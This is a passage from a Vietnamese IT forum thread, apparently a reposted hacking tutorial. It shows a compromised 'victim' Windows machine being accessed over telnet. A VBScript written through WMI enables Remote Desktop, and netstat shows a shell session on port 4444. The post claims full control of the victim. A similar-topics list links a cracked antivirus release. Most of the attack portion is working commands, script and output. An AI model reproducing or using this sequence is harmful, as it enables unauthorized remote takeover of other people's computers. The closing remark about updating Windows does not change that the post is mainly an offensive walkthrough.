Cryptographic Services
DHCP Client
Distributed File System
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
Internet Connection Firewall (ICF) / Internet Connect
IPSEC Services
Logical Disk Manager
Network Connections
Network Location Awareness (NLA)
NT LM Security Support Provider
Plug and Play
Print Spooler
Protected Storage
Remote Access Connection Manager
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Telephony
Telnet
Terminal Services
VMware Tools Service
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation

The command completed successfully.


- Như vậy là máy victim có chạy telnet ! ta telnet vào máy victim và command nào



Code:

*================================================= ==============
Welcome to Microsoft Telnet Server.
*================================================= ==============
C:\>ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.19.139.181
Subnet Mask . . . . . . . . . . . : 255.0.0.0
Default Gateway . . . . . . . . . : 10.19.128.1

C:\>copy con remote.vbs
machine = "."
cimv2_string = "WINMGMTS:" & "\" & machine & "\root\cimv2"
query = "select * from Win32_TerminalServiceSetting"
value_to_set = 1 ' 0=off, 1=on


set cimv2 = GetObject( cimv2_string )
set items = cimv2.ExecQuery( query )

for each item in items

item.SetAllowTSConnections( value_to_set )

next^Z
1 file(s) copied.

C:\>dir
Volume in drive C has no label.
Volume Serial Number is C022-B43C

Directory of C:\

12/19/2008 10:36 PM 0 AUTOEXEC.BAT
12/19/2008 10:36 PM 0 CONFIG.SYS
12/28/2008 01:29 PM Documents and Settings
12/27/2008 10:14 PM 0 lk.vbs
12/27/2008 10:32 PM 0 net
12/21/2008 09:48 PM Program Files
12/28/2008 01:29 PM 321 remote.vbs
12/27/2008 07:40 PM WINDOWS
12/19/2008 10:37 PM wmpub
5 File(s) 321 bytes
4 Dir(s) 105,423,151,104 bytes free

C:\>remote.vbs

C:\>netstat -ano

Active Connections

Proto Local Address Foreign Address State PID
TCP 0.0.0.0:23 0.0.0.0:0 LISTENING 1140
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 700
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 528
TCP 0.0.0.0:1026 0.0.0.0:0 LISTENING 968
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING 752
TCP 10.19.139.181:23 10.19.139.180:3027 ESTABLISHED 1140
TCP 10.19.139.181:139 0.0.0.0:0 LISTENING 4
TCP 10.19.139.181:445 10.19.139.180:3024 ESTABLISHED 4
TCP 10.19.139.181:4444 10.19.139.180:3020 ESTABLISHED 700
TCP 127.0.0.1:3001 0.0.0.0:0 LISTENING 1272
TCP 127.0.0.1:3002 0.0.0.0:0 LISTENING 968
TCP 127.0.0.1:3003 0.0.0.0:0 LISTENING 968
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:500 *:* 528
UDP 0.0.0.0:1027 *:* 908
UDP 0.0.0.0:3005 *:* 968
UDP 0.0.0.0:4500 *:* 528
UDP 10.19.139.181:123 *:* 968
UDP 10.19.139.181:137 *:* 4
UDP 10.19.139.181:138 *:* 4
UDP 127.0.0.1:123 *:* 968

C:\>mstsc


[You must be registered and logged in to see this link.]

Như vậy đã đã hoàn toàn làm chủ được máy tính của victim .
Ngoài ra cũng còn có thể sử dụng cách Remote Registry để bật chức năng
Remote Desktop của máy victim (Bữa nào rảnh LK sẽ viết để các bạn tham
khảo)
Qua đây ta thấy tầm quan trọng của việc update windows.
Chúc các bạn thành công

[thegioimang.org]


<==============================>

Đang mò lại cái thằng metasploit thấy có bài này hay nên leech về cho ae tham khảo

Hiện nay trên HVA có nói về 1 Bug của IE. các bạn có thể tham khảo thêm. Nó cũng dc cập nhật lên metasploit rồi đó
Về Đầu Trang Go down
Sponsored content




Bài gửiTiêu đề: Re: KHÓA HỌC MCSA 2011   

Về Đầu Trang Go down
 
KHÓA HỌC MCSA 2011
Xem chủ đề cũ hơn Xem chủ đề mới hơn Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» BẢN CRACK MỚI CHO KIS 2011 Cập nhật ngày 01/10/2010
» FPT dự kiến năm 2011 phóng vệ tinh đầu tiên
» miễn phí một năm sử dụng AVG Internet Security 2011 trị giá 44.99$
» Đại chiến trình duyệt web năm 2011, ai là kẻ chiến thắng?
» UEFA Champion League và Europa League 2011 -2012 trên VTV3

Permissions in this forum:Bạn không có quyền trả lời bài viết
Mạc Sương :: KIẾN THỨC TIN HOC :: Mạng-
Chuyển đến